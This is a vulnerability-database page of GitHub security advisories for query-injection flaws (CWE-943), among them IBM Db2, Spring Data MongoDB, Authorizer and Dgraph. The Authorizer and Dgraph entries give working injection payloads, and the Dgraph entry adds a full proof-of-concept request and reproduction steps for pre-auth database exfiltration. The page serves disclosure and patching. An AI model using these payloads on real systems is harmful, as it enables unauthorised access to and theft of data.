Common Weakness Enumeration

CWE-943

Allowed-with-Review

Improper Neutralization of Special Elements in Data Query Logic

Abstraction: Class · Status: Incomplete

The product generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query.

117 vulnerabilities reference this CWE, most recent first.

GHSA-GR2V-3FHG-H4JH

Vulnerability from github – Published: 2026-01-31 00:30 – Updated: 2026-01-31 00:30
VLAI
Details

IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5.0 - 11.5.9 and 12.1.0 - 12.1.3 could allow a local user to cause a denial of service due to improper neutralization of special elements in data query logic.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-36353"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-30T22:15:53Z",
    "severity": "MODERATE"
  },
  "details": "IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5.0 - 11.5.9 and 12.1.0 - 12.1.3 could allow a local user to cause a denial of service due to improper neutralization of special elements in data query logic.",
  "id": "GHSA-gr2v-3fhg-h4jh",
  "modified": "2026-01-31T00:30:28Z",
  "published": "2026-01-31T00:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36353"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7257632"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H3JF-FJ6H-58J8

Vulnerability from github – Published: 2026-03-16 15:30 – Updated: 2026-03-20 18:31
VLAI
Details

Non-relational SQL injection vulnerability (NoSQLi) in the Wakyma web application, specifically in the endpoint 'vets.wakyma.com/centro/equipo/empleado'. This vulnerability could allow an authenticated user to alter a GET request to the affected endpoint for the purpose of injecting special NoSQL commands. This would lead to the enumeration of sensitive employee data.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-3021"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89",
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-16T14:19:45Z",
    "severity": "HIGH"
  },
  "details": "Non-relational SQL injection vulnerability (NoSQLi) in the Wakyma web application, specifically in the endpoint \u0027vets.wakyma.com/centro/equipo/empleado\u0027. This vulnerability could allow an authenticated user to alter a GET request to the affected endpoint for the purpose of injecting special NoSQL commands. This would lead to the enumeration of sensitive employee data.",
  "id": "GHSA-h3jf-fj6h-58j8",
  "modified": "2026-03-20T18:31:16Z",
  "published": "2026-03-16T15:30:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3021"
    },
    {
      "type": "WEB",
      "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-wakyma-application-web"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-HC43-M36C-8V33

Vulnerability from github – Published: 2026-06-10 00:31 – Updated: 2026-06-10 00:31
VLAI
Details

Spring Data MongoDB repository query methods annotated with @Query that use regex parameter binding perform insufficient validation of the bound parameter. An attacker can supply a crafted string to break out of the intended regular expression quoting.

Affected versions: Spring Data MongoDB 5.0.0 through 5.0.5; 4.5.0 through 4.5.11; 4.4.0 through 4.4.14; 4.3.0 through 4.3.16; 4.2.0 through 4.2.15; 4.1.0 through 4.1.14; 4.0.0 through 4.0.15; 3.4.0 through 3.4.19.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-41696"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-10T00:16:50Z",
    "severity": "MODERATE"
  },
  "details": "Spring Data MongoDB repository query methods annotated with @Query that use regex parameter binding perform insufficient validation of the bound parameter. An attacker can supply a crafted string to break out of the intended regular expression quoting.\n\nAffected versions:\nSpring Data MongoDB 5.0.0 through 5.0.5; 4.5.0 through 4.5.11; 4.4.0 through 4.4.14; 4.3.0 through 4.3.16; 4.2.0 through 4.2.15; 4.1.0 through 4.1.14; 4.0.0 through 4.0.15; 3.4.0 through 3.4.19.",
  "id": "GHSA-hc43-m36c-8v33",
  "modified": "2026-06-10T00:31:51Z",
  "published": "2026-06-10T00:31:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41696"
    },
    {
      "type": "WEB",
      "url": "https://spring.io/security/cve-2026-41696"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JFWG-RXF3-P7R9

Vulnerability from github – Published: 2026-04-06 17:56 – Updated: 2026-04-06 17:56
VLAI
Summary
Authorizer: CQL/N1QL Injection in Cassandra and Couchbase Backends via fmt.Sprintf String Interpolation
Details

Vulnerability Details

CWE: CWE-943 - Improper Neutralization of Special Elements in Data Query Logic

All 66+ CQL queries in internal/storage/db/cassandradb/ use fmt.Sprintf to interpolate user-controlled values directly into CQL query strings without parameterization.

Unauthenticated endpoints (signup, login, forgot_password, magic_link_login) pass user input directly into CQL query strings.

Note: This advisory covers the Cassandra CQL injection only. The Couchbase N1QL injection is tracked in a separate advisory per CVE rule 4.2.11.

Affected Code Pattern

// Before (VULNERABLE) - e.g. cassandradb/user.go
query := fmt.Sprintf("SELECT ... FROM %s WHERE email = '%s'", table, email)
err := p.db.Query(query).Scan(...)

Steps to Reproduce

  1. Deploy Authorizer <= 2.0.0 with Cassandra backend
  2. Send a signup request with a CQL injection payload in the email field:
curl -X POST http://localhost:8080/graphql \
  -H 'Content-Type: application/json' \
  -d '{"query":"mutation { signup(params: { email: \"test'\" }) { message } }"}'
  1. The single quote breaks out of the CQL string literal, causing a CQL parse error that leaks internal schema information
  2. Crafted payloads can manipulate query logic to bypass authentication or extract data

Affected Files (10 Cassandra files)

Package File Queries Fixed
cassandradb user.go 7
cassandradb otp.go 4
cassandradb session_token.go 19
cassandradb verification_requests.go 4
cassandradb authenticator.go 3
cassandradb email_template.go 5
cassandradb webhook.go 5
cassandradb webhook_log.go 2
cassandradb session.go 1
cassandradb env.go 2

Impact

An unauthenticated attacker can inject arbitrary CQL operators through the email, phone, or token parameters on public-facing endpoints (signup, login, forgot_password, magic_link_login). This enables authentication bypass and data exfiltration from the Cassandra keyspace.

Proposed Fix

Use parameterized queries:

// After (FIXED)
query := fmt.Sprintf("SELECT ... FROM %s WHERE email = ?", table)
err := p.db.Query(query, email).Scan(...)

Fixed in https://github.com/authorizerdev/authorizer/pull/500 (merged 2026-03-27).

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/authorizerdev/authorizer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260327055742-73679faa53cd"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-209",
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-06T17:56:31Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Vulnerability Details\n\n**CWE:** CWE-943 - Improper Neutralization of Special Elements in Data Query Logic\n\nAll 66+ CQL queries in `internal/storage/db/cassandradb/` use `fmt.Sprintf` to interpolate user-controlled values directly into CQL query strings without parameterization.\n\nUnauthenticated endpoints (`signup`, `login`, `forgot_password`, `magic_link_login`) pass user input directly into CQL query strings.\n\n**Note:** This advisory covers the Cassandra CQL injection only. The Couchbase N1QL injection is tracked in a separate advisory per CVE rule 4.2.11.\n\n## Affected Code Pattern\n\n```go\n// Before (VULNERABLE) - e.g. cassandradb/user.go\nquery := fmt.Sprintf(\"SELECT ... FROM %s WHERE email = \u0027%s\u0027\", table, email)\nerr := p.db.Query(query).Scan(...)\n```\n\n## Steps to Reproduce\n\n1. Deploy Authorizer \u003c= 2.0.0 with Cassandra backend\n2. Send a signup request with a CQL injection payload in the email field:\n\n```bash\ncurl -X POST http://localhost:8080/graphql \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"query\":\"mutation { signup(params: { email: \\\"test\u0027\\\" }) { message } }\"}\u0027\n```\n\n3. The single quote breaks out of the CQL string literal, causing a CQL parse error that leaks internal schema information\n4. Crafted payloads can manipulate query logic to bypass authentication or extract data\n\n## Affected Files (10 Cassandra files)\n\n| Package | File | Queries Fixed |\n|---------|------|--------------|\n| cassandradb | user.go | 7 |\n| cassandradb | otp.go | 4 |\n| cassandradb | session_token.go | 19 |\n| cassandradb | verification_requests.go | 4 |\n| cassandradb | authenticator.go | 3 |\n| cassandradb | email_template.go | 5 |\n| cassandradb | webhook.go | 5 |\n| cassandradb | webhook_log.go | 2 |\n| cassandradb | session.go | 1 |\n| cassandradb | env.go | 2 |\n\n## Impact\n\nAn unauthenticated attacker can inject arbitrary CQL operators through the email, phone, or token parameters on public-facing endpoints (signup, login, forgot_password, magic_link_login). This enables authentication bypass and data exfiltration from the Cassandra keyspace.\n\n## Proposed Fix\n\nUse parameterized queries:\n\n```go\n// After (FIXED)\nquery := fmt.Sprintf(\"SELECT ... FROM %s WHERE email = ?\", table)\nerr := p.db.Query(query, email).Scan(...)\n```\n\nFixed in https://github.com/authorizerdev/authorizer/pull/500 (merged 2026-03-27).",
  "id": "GHSA-jfwg-rxf3-p7r9",
  "modified": "2026-04-06T17:56:31Z",
  "published": "2026-04-06T17:56:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/authorizerdev/authorizer/security/advisories/GHSA-jfwg-rxf3-p7r9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/authorizerdev/authorizer/pull/500"
    },
    {
      "type": "WEB",
      "url": "https://github.com/authorizerdev/authorizer/commit/73679faa53cd215c7524d651046e402c43809786"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/authorizerdev/authorizer"
    },
    {
      "type": "WEB",
      "url": "https://github.com/authorizerdev/authorizer/releases/tag/2.0.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Authorizer: CQL/N1QL Injection in Cassandra and Couchbase Backends via fmt.Sprintf String Interpolation"
}

GHSA-JH92-GC65-PG86

Vulnerability from github – Published: 2026-07-08 21:30 – Updated: 2026-07-08 21:30
VLAI
Details

Improper Neutralization of Special Elements in Data Query Logic vulnerability in Progress MOVEit Transfer (Custom Reports modules).

This issue affects MOVEit Transfer: before 2025.0.7, from 2025.1.0 before 2025.1.3.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-8649"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-08T20:17:00Z",
    "severity": "MODERATE"
  },
  "details": "Improper Neutralization of Special Elements in Data Query Logic vulnerability in Progress MOVEit Transfer (Custom Reports modules).\n\nThis issue affects MOVEit Transfer: before 2025.0.7, from 2025.1.0 before 2025.1.3.",
  "id": "GHSA-jh92-gc65-pg86",
  "modified": "2026-07-08T21:30:29Z",
  "published": "2026-07-08T21:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8649"
    },
    {
      "type": "WEB",
      "url": "https://docs.progress.com/bundle/moveit-transfer-release-notes-2026/page/Fixed-Issues-in-2026.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JM7G-M582-79Q7

Vulnerability from github – Published: 2026-01-13 03:32 – Updated: 2026-01-13 03:32
VLAI
Details

Due to insufficient input handling, the SAP Identity Management REST interface allows an authenticated administrator to submit specially crafted malicious REST requests that are processed by JNDI operations without adequate input neutralization. This may lead to limited disclosure or modification of data, resulting in low impact on confidentiality and integrity, with no impact on application availability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-0504"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-13T02:15:53Z",
    "severity": "LOW"
  },
  "details": "Due to insufficient input handling, the SAP Identity Management REST interface allows an authenticated administrator to submit specially crafted malicious REST requests that are processed by JNDI operations without adequate input neutralization. This may lead to limited disclosure or modification of data, resulting in low impact on confidentiality and integrity, with no impact on application availability.",
  "id": "GHSA-jm7g-m582-79q7",
  "modified": "2026-01-13T03:32:09Z",
  "published": "2026-01-13T03:32:09Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0504"
    },
    {
      "type": "WEB",
      "url": "https://me.sap.com/notes/3657998"
    },
    {
      "type": "WEB",
      "url": "https://url.sap/sapsecuritypatchday"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MRXX-39G5-PH77

Vulnerability from github – Published: 2026-04-24 15:41 – Updated: 2026-05-04 20:08
VLAI
Summary
Dgraph: Pre-Auth Full Database Exfiltration via DQL Injection in Upsert Condition Field
Details

1. Executive Summary

A vulnerability has been found in Dgraph that gives an unauthenticated attacker full read access to every piece of data in the database. This affects Dgraph's default configuration where ACL is not enabled.

The attack is a single HTTP POST to /mutate?commitNow=true containing a crafted cond field in an upsert mutation. The cond value is concatenated directly into a DQL query string via strings.Builder.WriteString after only a cosmetic strings.Replace transformation. No escaping, parameterization, or structural validation is applied. An attacker injects an additional DQL query block into the cond string, which the DQL parser accepts as a syntactically valid named query block. The injected query executes server-side and its results are returned in the HTTP response.

There are no credentials involved. When ACL is disabled (the default), the /mutate endpoint requires no authentication. The authorizeQuery and authorizeMutation functions both return nil immediately when AclSecretKey is not configured. Even when ACL is enabled, a user with mutation-only permission can inject read queries that bypass per-predicate ACL authorization, because the injected query block is not subject to the normal authorization flow.

POC clip:

https://github.com/user-attachments/assets/edf43615-b0d5-46cd-abd9-2cb9423790d2

2. CVSS Score

CVSS 3.1: 9.1 (Critical)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Metric Value Rationale
Attack Vector Network HTTP POST to port 8080
Attack Complexity Low Single request, no special conditions beyond default config
Privileges Required None No authentication when ACL is disabled (default)
User Interaction None Fully automated
Scope Unchanged Stays within the Dgraph data layer
Confidentiality High Full database exfiltration: all nodes, all predicates, all values
Integrity High The injection can also be used to manipulate upsert conditions, bypassing uniqueness constraints and conditional mutation logic
Availability None No denial of service

3. Vulnerability Summary

Field Value
Title Pre-Auth DQL Injection via Unsanitized Cond Field in Upsert Mutations
Type Injection
CWE CWE-943 (Improper Neutralization of Special Elements in Data Query Logic)
CVSS 9.8

4. Target Information

Field Value
Project Dgraph
Repository https://github.com/dgraph-io/dgraph
Tested version v25.3.0
HTTP handler dgraph/cmd/alpha/http.go line 345 (mutationHandler)
Cond extraction dgraph/cmd/alpha/http.go line 413 (strconv.Unquote)
Cond passthrough edgraph/server.go line 2011 (ParseMutationObject, copies mu.Cond verbatim)
Injection sink edgraph/server.go line 750 (upsertQB.WriteString(cond))
Only transformation edgraph/server.go line 730 (strings.Replace(gmu.Cond, "@if", "@filter", 1))
Auth bypass (query) edgraph/access.go line 958 (authorizeQuery returns nil when AclSecretKey == nil)
Auth bypass (mutate) edgraph/access.go line 788 (authorizeMutation returns nil when AclSecretKey == nil)
Response exfiltration dgraph/cmd/alpha/http.go line 498 (mp["queries"] = json.RawMessage(resp.Json))
HTTP port 8080 (default)
Prerequisite None. Default configuration. ACL disabled is the default.

5. Test Environment

Component Version / Details
Host OS macOS (darwin 25.3.0)
Dgraph v25.3.0 via dgraph/dgraph:latest Docker image
Docker Compose 1 Zero + 1 Alpha, default config, --security whitelist=0.0.0.0/0
Python 3.x with requests
Network localhost (127.0.0.1)

6. Vulnerability Detail

Location: edgraph/server.go lines 714-757 (buildUpsertQuery) CWE: CWE-943 (Improper Neutralization of Special Elements in Data Query Logic)

The /mutate endpoint accepts JSON bodies containing a mutations array. Each mutation can include a cond field, intended for conditional upserts with syntax like @if(eq(name, "Alice")). This condition is supposed to be spliced into the DQL query as a @filter clause on a dummy var(func: uid(0)) block.

The handler at http.go:413 extracts the cond value via strconv.Unquote, which interprets \n as actual newlines but performs no sanitization:

mu.Cond, err = strconv.Unquote(string(condText.bs))

ParseMutationObject at server.go:2011 copies it verbatim:

res := &dql.Mutation{Cond: mu.Cond}

buildUpsertQuery at server.go:730 applies one cosmetic replacement then concatenates the raw string directly into the DQL query:

cond := strings.Replace(gmu.Cond, "@if", "@filter", 1)
// ...
x.Check2(upsertQB.WriteString(cond))

There is no escaping, no parameterization, no structural validation, and no character allowlist between the HTTP input and the query string concatenation.

An attacker crafts a cond value that closes the @filter(...) clause and opens an entirely new named query block:

@if(eq(name, "nonexistent"))
  leak(func: has(dgraph.type)) { uid name email secret }

After buildUpsertQuery processes this, the resulting DQL is:

{
  q(func: uid(0x1)) { uid }
  __dgraph_upsertcheck_0__ as var(func: uid(0)) @filter(eq(name, "nonexistent"))
  leak(func: has(dgraph.type)) { uid name email secret }
}

The DQL parser (dql.ParseWithNeedVars) accepts multiple query blocks within a single {} container. It parses leak(...) as a legitimate named query. The validateResult function at parser.go:740 only checks for duplicate aliases and explicitly skips var queries. The injected query uses a unique alias, so validation passes.

All three queries execute. The results of the injected leak block are serialized to JSON and returned to the attacker at http.go:498:

mp["queries"] = json.RawMessage(resp.Json)

The @if condition evaluates to false ("nonexistent" matches nothing), so the set mutation never actually writes data. The attack is a pure read disguised as a mutation. No data is modified.

7. Full Chain Explanation

The attacker has no Dgraph credentials and no prior access to the server.

Step 1. The attacker sends one HTTP request:

POST /mutate?commitNow=true HTTP/1.1
Host: TARGET:8080
Content-Type: application/json

{
  "query": "{ q(func: uid(0x1)) { uid } }",
  "mutations": [{
    "set": [{"uid": "0x1", "dgraph.type": "Dummy"}],
    "cond": "@if(eq(name, \"nonexistent\"))\n  leak(func: has(dgraph.type)) { uid dgraph.type name email secret aws_access_key_id aws_secret_access_key gcp_service_account_key }"
  }]
}

No X-Dgraph-AccessToken header. No X-Dgraph-AuthToken header. The /mutate endpoint has no authentication wrapper in default configuration.

Step 2. mutationHandler at http.go:345 calls readRequest to get the body, then extractMutation which calls strconv.Unquote on the cond field. The \n becomes a real newline. The result is stored in api.Mutation.Cond.

Step 3. The request enters edgraph.Server.QueryNoGrpc at http.go:471, which calls doQuery -> parseRequest -> ParseMutationObject. The Cond is copied verbatim to dql.Mutation.Cond at server.go:2011.

Step 4. buildUpsertQuery at server.go:714 processes the condition. The only transformation is strings.Replace(gmu.Cond, "@if", "@filter", 1) at line 730. The full string, including the injected leak(...) block, is written into the query builder at line 750.

Step 5. dql.ParseWithNeedVars parses the constructed DQL string. It encounters three query blocks: q, the upsert check var, and the injected leak. All three are accepted as valid DQL.

Step 6. authorizeQuery at access.go:958 returns nil immediately because AclSecretKey == nil (ACL not configured). No predicate-level authorization is performed.

Step 7. processQuery executes all three query blocks. The leak block traverses every node with a dgraph.type predicate and returns all requested fields.

Step 8. The response is returned to the attacker at http.go:498. The data.queries.leak array contains every matching node with all their predicates, including secrets, credentials, and PII.

8. Proof of Concept

Files

File Purpose
report.md This vulnerability report
poc.py Exploit: sends the injection and prints leaked data
docker-compose.yml Spins up a Dgraph cluster (1 Zero + 1 Alpha, default config)
DGraphPreAuthDQL.mp4 Screen recording of the full attack from start to exfiltration

POC files zip: LEAD_001_DQL.zip

poc.py

The exploit sends a single POST to /mutate?commitNow=true with the crafted cond field. It parses the response and prints all exfiltrated records, highlighting secrets, AWS credentials, and GCP service account keys.

Tested Output

$ python3 poc.py
[*] Sending crafted upsert mutation with DQL injection in cond field …
[*] HTTP 200
[+] SUCCESS — Injected query returned 5 node(s):

  [User] uid=0x1
    name: Alice Admin
    email: alice@corp.com
    secret: SSN-123-45-6789
    role: admin

  [User] uid=0x2
    name: Bob User
    email: bob@corp.com
    secret: SSN-987-65-4321
    role: user

  [User] uid=0x3
    name: Eve Secret
    email: eve@corp.com
    secret: API_KEY_sk-live-abc123xyz
    role: superadmin

  [CloudCredential] uid=0x4
    name: prod-aws-credentials
    AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE
    AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

  [CloudCredential] uid=0x5
    name: gcp-bigquery-service-account
    GCP_SERVICE_ACCOUNT_KEY: {"type":"service_account","project_id":"prod-analytics","private_key":"-----BEGI…

[+] CRITICAL — Exfiltrated 5 record(s) containing secrets via pre-auth DQL injection
    → 1 AWS credential(s) — attacker can access AWS account
    → 1 GCP service account key(s) — attacker can access GCP project

9. Steps to Reproduce

Prerequisites

  • Python 3 with requests (pip install requests)
  • Docker and Docker Compose

Step 1: Start Dgraph

cd report
docker compose -f docker-compose-test.yml up -d

Wait for health:

curl http://localhost:8080/health

Step 2: Seed test data

curl -s -X POST http://localhost:8080/alter -d '
name: string @index(exact) .
email: string @index(exact) .
secret: string .
role: string .
aws_access_key_id: string .
aws_secret_access_key: string .
gcp_service_account_key: string .
'

curl -s -X POST 'http://localhost:8080/mutate?commitNow=true' \
  -H 'Content-Type: application/json' \
  -d '{"set":[
    {"dgraph.type":"User","name":"Alice Admin","email":"alice@corp.com","secret":"SSN-123-45-6789","role":"admin"},
    {"dgraph.type":"User","name":"Bob User","email":"bob@corp.com","secret":"SSN-987-65-4321","role":"user"},
    {"dgraph.type":"User","name":"Eve Secret","email":"eve@corp.com","secret":"API_KEY_sk-live-abc123xyz","role":"superadmin"},
    {"dgraph.type":"CloudCredential","name":"prod-aws-credentials","aws_access_key_id":"AKIAIOSFODNN7EXAMPLE","aws_secret_access_key":"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"},
    {"dgraph.type":"CloudCredential","name":"gcp-bigquery-service-account","gcp_service_account_key":"{\"type\":\"service_account\",\"project_id\":\"prod-analytics\",\"private_key\":\"-----BEGIN RSA PRIVATE KEY-----\\nEXAMPLEKEY\\n-----END RSA PRIVATE KEY-----\",\"client_email\":\"bigquery@prod-analytics.iam.gserviceaccount.com\"}"}
  ]}'

Step 3: Run the exploit

cd LEAD_001_DQL
python3 poc.py

What to verify

  1. HTTP POST returns 200 (endpoint is reachable without auth)
  2. Response contains data.queries.leak with an array of nodes
  3. The nodes include fields the attacker never queried through legitimate means (secrets, AWS keys, GCP keys)
  4. No data was modified in the database (the @if condition prevents the set from executing)

10. Mitigations and Patch

Location: edgraph/server.go, buildUpsertQuery (line 714)

Instead of concatenating the raw cond string into the DQL query, buildUpsertQuery should parse the cond value with the DQL lexer and construct the @filter as a parsed AST subtree. This eliminates the injection surface entirely because the filter is built programmatically rather than spliced in as a raw string. The existing strings.Replace(gmu.Cond, "@if", "@filter", 1) at line 730 is a semantic transformation, not a security control, and should not be relied upon for sanitization.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/dgraph-io/dgraph/v25"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "25.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/dgraph-io/dgraph/v24"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "24.1.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/dgraph-io/dgraph"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.2.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41327"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-24T15:41:21Z",
    "nvd_published_at": "2026-04-24T19:17:12Z",
    "severity": "CRITICAL"
  },
  "details": "## 1. Executive Summary\n\nA vulnerability has been found in Dgraph that gives an unauthenticated attacker full read access to every piece of data in the database. This affects Dgraph\u0027s default configuration where ACL is not enabled.\n\nThe attack is a single HTTP POST to `/mutate?commitNow=true` containing a crafted `cond` field in an upsert mutation. The `cond` value is concatenated directly into a DQL query string via `strings.Builder.WriteString` after only a cosmetic `strings.Replace` transformation. No escaping, parameterization, or structural validation is applied. An attacker injects an additional DQL query block into the `cond` string, which the DQL parser accepts as a syntactically valid named query block. The injected query executes server-side and its results are returned in the HTTP response.\n\nThere are no credentials involved. When ACL is disabled (the default), the `/mutate` endpoint requires no authentication. The `authorizeQuery` and `authorizeMutation` functions both return `nil` immediately when `AclSecretKey` is not configured. Even when ACL is enabled, a user with mutation-only permission can inject read queries that bypass per-predicate ACL authorization, because the injected query block is not subject to the normal authorization flow.\n\nPOC clip: \n\nhttps://github.com/user-attachments/assets/edf43615-b0d5-46cd-abd9-2cb9423790d2\n\n\n\n## 2. CVSS Score\n\n**CVSS 3.1: 9.1 (Critical)**\n\n```\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n```\n\n| Metric              | Value     | Rationale                                                                          |\n| ------------------- | --------- | ---------------------------------------------------------------------------------- |\n| Attack Vector       | Network   | HTTP POST to port 8080                                                             |\n| Attack Complexity   | Low       | Single request, no special conditions beyond default config                        |\n| Privileges Required | None      | No authentication when ACL is disabled (default)                                   |\n| User Interaction    | None      | Fully automated                                                                    |\n| Scope               | Unchanged | Stays within the Dgraph data layer                                                 |\n| Confidentiality     | High      | Full database exfiltration: all nodes, all predicates, all values                  |\n| Integrity           | High      | The injection can also be used to manipulate upsert conditions, bypassing uniqueness constraints and conditional mutation logic |\n| Availability        | None      | No denial of service                                                               |\n\n## 3. Vulnerability Summary\n\n| Field     | Value                                                                                      |\n| --------- | ------------------------------------------------------------------------------------------ |\n| Title     | Pre-Auth DQL Injection via Unsanitized Cond Field in Upsert Mutations                      |\n| Type      | Injection                                                                                  |\n| CWE       | CWE-943 (Improper Neutralization of Special Elements in Data Query Logic)                  |\n| CVSS      | 9.8                                                                                        |\n\n## 4. Target Information\n\n| Field                | Value                                                                                          |\n| -------------------- | ---------------------------------------------------------------------------------------------- |\n| Project              | Dgraph                                                                                         |\n| Repository           | https://github.com/dgraph-io/dgraph                                                           |\n| Tested version       | v25.3.0                                                                                        |\n| HTTP handler         | `dgraph/cmd/alpha/http.go` line 345 (`mutationHandler`)                                       |\n| Cond extraction      | `dgraph/cmd/alpha/http.go` line 413 (`strconv.Unquote`)                                       |\n| Cond passthrough     | `edgraph/server.go` line 2011 (`ParseMutationObject`, copies `mu.Cond` verbatim)              |\n| Injection sink       | `edgraph/server.go` line 750 (`upsertQB.WriteString(cond)`)                                   |\n| Only transformation  | `edgraph/server.go` line 730 (`strings.Replace(gmu.Cond, \"@if\", \"@filter\", 1)`)               |\n| Auth bypass (query)  | `edgraph/access.go` line 958 (`authorizeQuery` returns nil when `AclSecretKey == nil`)         |\n| Auth bypass (mutate) | `edgraph/access.go` line 788 (`authorizeMutation` returns nil when `AclSecretKey == nil`)      |\n| Response exfiltration| `dgraph/cmd/alpha/http.go` line 498 (`mp[\"queries\"] = json.RawMessage(resp.Json)`)            |\n| HTTP port            | 8080 (default)                                                                                 |\n| Prerequisite         | None. Default configuration. ACL disabled is the default.                                      |\n\n## 5. Test Environment\n\n| Component            | Version / Details                                               |\n| -------------------- | --------------------------------------------------------------- |\n| Host OS              | macOS (darwin 25.3.0)                                           |\n| Dgraph               | v25.3.0 via `dgraph/dgraph:latest` Docker image                |\n| Docker Compose       | 1 Zero + 1 Alpha, default config, `--security whitelist=0.0.0.0/0` |\n| Python               | 3.x with `requests`                                            |\n| Network              | localhost (127.0.0.1)                                           |\n\n## 6. Vulnerability Detail\n\n**Location:** `edgraph/server.go` lines 714-757 (`buildUpsertQuery`)\n**CWE:** CWE-943 (Improper Neutralization of Special Elements in Data Query Logic)\n\nThe `/mutate` endpoint accepts JSON bodies containing a `mutations` array. Each mutation can include a `cond` field, intended for conditional upserts with syntax like `@if(eq(name, \"Alice\"))`. This condition is supposed to be spliced into the DQL query as a `@filter` clause on a dummy `var(func: uid(0))` block.\n\nThe handler at `http.go:413` extracts the `cond` value via `strconv.Unquote`, which interprets `\\n` as actual newlines but performs no sanitization:\n\n```go\nmu.Cond, err = strconv.Unquote(string(condText.bs))\n```\n\n`ParseMutationObject` at `server.go:2011` 